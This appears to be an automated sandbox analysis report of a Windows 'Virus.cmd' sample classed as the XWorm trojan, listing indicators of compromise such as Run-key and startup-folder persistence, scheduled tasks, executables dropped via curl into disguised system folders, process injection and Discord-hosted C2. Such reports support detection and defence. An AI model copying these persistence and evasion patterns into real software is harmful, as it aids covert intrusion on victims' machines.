Malware Analysis Report

2024-11-16 13:30

Sample ID 240621-vnb19aybkh
Target Virus.cmd
SHA256 d90f45a296a620f69256791f49a794451c83192cd8244600c3e26c5cd0e16e94
Tags
xworm evasion execution persistence rat trojan
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

d90f45a296a620f69256791f49a794451c83192cd8244600c3e26c5cd0e16e94

Threat Level: Known bad

The file Virus.cmd was found to be: Known bad.

Malicious Activity Summary

xworm evasion execution persistence rat trojan

Xworm

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Sets file to hidden

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Executes dropped EXE

Drops startup file

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Scheduled Task/Job: Scheduled Task

Views/modifies file attributes

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 17:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 17:07

Reported

2024-06-21 17:10

Platform

win11-20240611-en

Max time kernel

145s

Max time network

153s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 2496 created 640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe
PID 1616 created 640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

Downloads MZ/PE file

Sets file to hidden

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\attrib.exe | N/A
N/A | N/A | C:\Windows\system32\attrib.exe | N/A
N/A | N/A | C:\Windows\system32\attrib.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk | C:\ProgramData\x4V5.2.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk | C:\ProgramData\x4V5.2.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x4Joex1.exe" | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\Malicious = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Malicious.exe" | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Malicious = "C:\\Users\\Admin\\x4Malicious" | C:\ProgramData\x4V5.2.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\ProgramData\\x4Joex1.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | discord.com | N/A | N/A
N/A | discord.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | icanhazip.com | N/A | N/A
N/A | ip-api.com | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | C:\Windows\system32\attrib.exe | N/A
File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | C:\Windows\system32\attrib.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\x4Joex1 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | C:\Windows\system32\attrib.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\x4Malicious | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\x4svc64 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx | C:\Windows\System32\svchost.exe | N/A
File created | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | C:\Windows\system32\curl.exe | N/A
File created | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | C:\Windows\system32\curl.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File created | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | C:\Windows\system32\curl.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\Malicious | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2496 set thread context of 1100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe
PID 1616 set thread context of 2080 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A
File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A
File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A
File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A
File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A
File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A
File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A
File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\timeout.exe | N/A
N/A | N/A | C:\Windows\system32\timeout.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718989760" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 21 Jun 2024 17:09:21 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData | C:\Windows\system32\ApplicationFrameHost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye | C:\Windows\system32\ApplicationFrameHost.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye = "2814749767500776" | C:\Windows\system32\ApplicationFrameHost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!mi | C:\Windows\Explorer.EXE | N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
